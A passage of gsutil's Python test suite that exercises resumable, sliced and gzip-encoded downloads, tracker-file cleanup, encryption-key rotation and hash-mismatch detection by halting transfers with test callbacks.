contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest(boto_config):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_break(self):
"""Tests that a download can be resumed after a connection break."""
self._test_cp_resumable_download_break_helper([
('GSUtil', 'resumable_threshold', str(ONE_KIB))
])
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_break(self):
"""Tests that an encrypted download resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
self._test_cp_resumable_download_break_helper(
[('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)],
encryption_key=TEST_ENCRYPTION_KEY1)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_key_rotation(self):
"""Tests that a download restarts with a rotated encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
# After simulated connection break, rotate the key on the object.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY1),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['rewrite', '-k', suri(object_uri)])
# Now resume the download using only the new encryption key. Since its
# generation changed, we must restart it.
boto_config_for_test3 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test3):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Restarting download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
@SequentialAndParallelTransfer
def test_cp_resumable_download_etag_differs(self):
"""Tests that download restarts the file when the source object changes.
This causes the etag not to match.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
# This will create a tracker file with an ETag.
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
# Create a new object with different contents - it should have a
# different ETag since the content has changed.
object_uri = self.CreateObject(
bucket_uri=bucket_uri,
object_name='foo',
contents=b'b' * self.halt_size,
gs_idempotent_generation=object_uri.generation)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# TODO: Enable this test for sequential downloads when their tracker files are
# modified to contain the source object generation.
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_resumable_download_generation_differs(self):
"""Tests that a resumable download restarts if the generation differs."""
bucket_uri = self.CreateBucket()
file_contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
# Overwrite the object with an identical object, increasing
# the generation but leaving other metadata the same.
identical_file = self.CreateTempFile(contents=file_contents)
self.RunGsUtil(['cp', suri(identical_file), suri(object_uri)])
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertIn('Restarting download from scratch', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_file_larger(self):
"""Tests download deletes the tracker file when existing file is larger."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
with open(fpath + '_.gstmp', 'w') as larger_file:
for _ in range(self.halt_size * 2):
larger_file.write('a')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
self.assertIn('Deleting tracker file', stderr)
def test_cp_resumable_download_content_differs(self):
"""Tests that we do not re-download when tracker file matches existing file.
    We only compare size, not contents, so a re-download should not occur even
    though the contents are technically different. However, hash validation on
    the completed file still occurs, and the file is then deleted because the
    hashes differ.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'w') as fp:
fp.write('abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
try:
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Download already complete', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
# File and tracker file should be deleted.
self.assertFalse(os.path.isfile(temp_download_file))
self.assertFalse(os.path.isfile(tracker_filename))
# Permanent file should not have been created.
self.assertFalse(os.path.isfile(fpath))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_content_matches(self):
"""Tests download no-ops when tracker file matches existing file."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
matching_contents = b'abcd' * ONE_KIB
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'wb') as fp:
fp.write(matching_contents)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=matching_contents)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Download already complete', stderr)
# Tracker file should be removed after successful hash validation.
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_tracker_file_not_matches(self):
"""Tests that download overwrites when tracker file etag does not match."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir, contents=b'abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match regex for exactly one object ETag')
etag = etag_match.group(1)
etag += 'nonmatching'
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Ensure the file was overwritten.
with open(fpath, 'r') as in_fp:
contents = in_fp.read()
self.assertEqual(
contents, 'efgh' * ONE_KIB,
'File not overwritten when it should have been '
'due to a non-matching tracker file.')
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
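  # The three preceding tests repeat the same ETag-extraction pattern against
  # `ls -L` output. A minimal sketch of how that pattern could be factored out
  # (hypothetical helper; not part of gsutil's test API and not called above):
  def _example_get_object_etag(self, object_uri_str):
    """Returns the ETag reported by `ls -L` for the given object URL."""
    stdout = self.RunGsUtil(['ls', '-L', object_uri_str], return_stdout=True)
    etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
    self.assertIsNotNone(etag_match, 'Could not get object ETag')
    return etag_match.group(1)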
def test_cp_double_gzip(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
self.RunGsUtil([
'-h', 'content-type:application/gzip', 'cp', '-Z',
suri(fpath),
suri(bucket_uri, 'foo')
])
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_double_gzip_transport_encoded(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
stderr = self.RunGsUtil([
'-D', '-h', 'content-type:application/gzip', 'cp', '-J',
suri(fpath),
suri(bucket_uri, 'foo')
],
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SequentialAndParallelTransfer
def test_cp_resumable_download_gzip(self):
"""Tests that download can be resumed successfully with a gzipped file."""
    # Generate some reasonably incompressible data. This compresses to roughly
    # 128K in practice, but we assert specifically below that the compressed
    # object is larger than self.halt_size to guarantee that we can halt the
    # download partway through.
object_uri = self.CreateObject()
random.seed(0)
contents = str([
random.choice(string.ascii_letters) for _ in xrange(self.halt_size)
]).encode('ascii')
random.seed() # Reset the seed for any other tests.
fpath1 = self.CreateTempFile(file_name='unzipped.txt', contents=contents)
self.RunGsUtil(['cp', '-z', 'txt', suri(fpath1), suri(object_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _GetObjectSize():
stdout = self.RunGsUtil(['du', suri(object_uri)], return_stdout=True)
size_match = re.search(r'(\d+)\s+.*', stdout)
self.assertIsNotNone(size_match, 'Could not get object size')
self.assertEqual(len(size_match.groups()), 1,
'Did not match regex for exactly one object size.')
return long(size_match.group(1))
object_size = _GetObjectSize()
self.assertGreaterEqual(
object_size, self.halt_size,
        'Compressed object size was not large enough to '
'allow for a halted download, so the test results '
'would be invalid. Please increase the compressed '
'object size in the test.')
fpath2 = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath2)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
self.assertIn('Downloading to temp gzip filename', stderr)
# Tracker files will have different names depending on if we are
# downloading sequentially or in parallel.
sliced_download_threshold = HumanReadableToBytes(
boto.config.get('GSUtil', 'sliced_object_download_threshold',
DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD))
sliced_download = (len(contents) > sliced_download_threshold and
sliced_download_threshold > 0 and
UsingCrcmodExtension())
if sliced_download:
trackerfile_type = TrackerFileType.SLICED_DOWNLOAD
else:
trackerfile_type = TrackerFileType.DOWNLOAD
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath2),
trackerfile_type, self.test_api)
# We should have a temporary gzipped file, a tracker file, and no
# final file yet.
self.assertTrue(os.path.isfile(tracker_filename))
self.assertTrue(os.path.isfile('%s_.gztmp' % fpath2))
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath2)], return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
self.assertFalse(os.path.isfile(tracker_filename))
self.assertFalse(os.path.isfile('%s_.gztmp' % fpath2))
def _GetFaviconFile(self):
# Make a temp file from favicon.ico.gz. Finding the location of our test
# data varies depending on how/where gsutil was installed, so we get the
# data via pkgutil and use this workaround.
if not hasattr(self, 'test_data_favicon_file'):
contents = pkgutil.get_data('gslib', 'tests/test_data/favicon.ico.gz')
self.test_data_favicon_file = self.CreateTempFile(contents=contents)
return self.test_data_favicon_file
def test_cp_download_transfer_encoded(self):
"""Tests chunked transfer encoded download handling.
Tests that download works correctly with a gzipped chunked transfer-encoded
object (which therefore lacks Content-Length) of a size that gets fetched
in a single chunk (exercising downloading of objects lacking a length
response header).
"""
# Upload a file / content-encoding / content-type that triggers this flow.
# Note: We need to use the file with pre-zipped format and manually set the
# content-encoding and content-type because the Python gzip module (used by
# gsutil cp -Z) won't reproduce the bytes that trigger this problem.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, object_name='foo')
input_filename = self._GetFaviconFile()
self.RunGsUtil([
'-h', 'Content-Encoding:gzip', '-h', 'Content-Type:image/x-icon', 'cp',
suri(input_filename),
suri(object_uri)
])
# Compute the MD5 of the uncompressed bytes.
with gzip.open(input_filename) as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
in_file_md5 = hash_dict['md5'].digest()
# Downloading this file triggers the flow.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
# Compute MD5 of the downloaded (uncompressed) file, and validate it.
with open(fpath2, 'rb') as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
out_file_md5 = hash_dict['md5'].digest()
self.assertEqual(in_file_md5, out_file_md5)
@SequentialAndParallelTransfer
def test_cp_resumable_download_check_hashes_never(self):
"""Tests that resumble downloads work with check_hashes = never."""
bucket_uri = self.CreateBucket()
contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'check_hashes', 'never')]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Found no hashes to validate object downloaded', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_bucket_deleted(self):
"""Tests that a not found exception is raised if bucket no longer exists."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * 2 * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_DeleteBucketThenStartOverCopyCallbackHandler(5, bucket_uri)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True,
expected_status=1)
self.assertIn('Deleting bucket', stderr)
self.assertIn('bucket does not exist', stderr)
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download(self):
"""Tests that sliced object download works in the general case."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * ONE_KIB)
fpath = self.CreateTempFile()
# Force fast crcmod to return True to test the basic sliced download
# scenario, ensuring that if the user installs crcmod, it will work.
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'test_assume_fast_crcmod', 'True'),
('GSUtil', 'sliced_object_download_threshold', str(ONE_KIB)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), fpath])
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * ONE_KIB, 'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_unresumable_sliced_download(self):
"""Tests sliced download works when resumability is disabled."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# No tracker files should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Perform the entire download, without resuming.
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume(self):
"""Tests that sliced object download is resumable."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_partial_resume(self):
"""Test sliced download resumability when some components are finished."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltOneComponentCopyCallbackHandler(5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Download already complete', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume_content_differs(self):
"""Tests differing file contents are detected by sliced downloads."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile(contents=b'')
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
with open(fpath + '_.gstmp', 'r+b') as f:
f.write(b'altered file contents')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Resuming download', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
self.assertIn('HashMismatchException: crc32c', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Temporary file should have been deleted due to hash mismatch.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Final file should not exist.
self.assertFalse(os.path.isfile(fpath))
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_component_size_changed(self):
"""Tests sliced download doesn't break when the boto config changes.
If the number of components used changes cross-process, the download should
be restarted.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 4)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 2)),
('GSUtil', 'sliced_object_download_max_components', '2')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Sliced download tracker file doesn\'t match ', stderr)
self.assertIn('Restarting download from scratch', stderr)
self.assertNotIn('Resuming download', stderr)
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_disabled_cross_process(self):
"""Tests temporary files are not orphaned if sliced download is disabled.
Specifically, temporary files should be deleted when the corresponding
non-sliced download is completed.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
# Disable sliced downloads by increasing the threshold
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should have been deleted.
for tracker_filename in tracker_filenames:
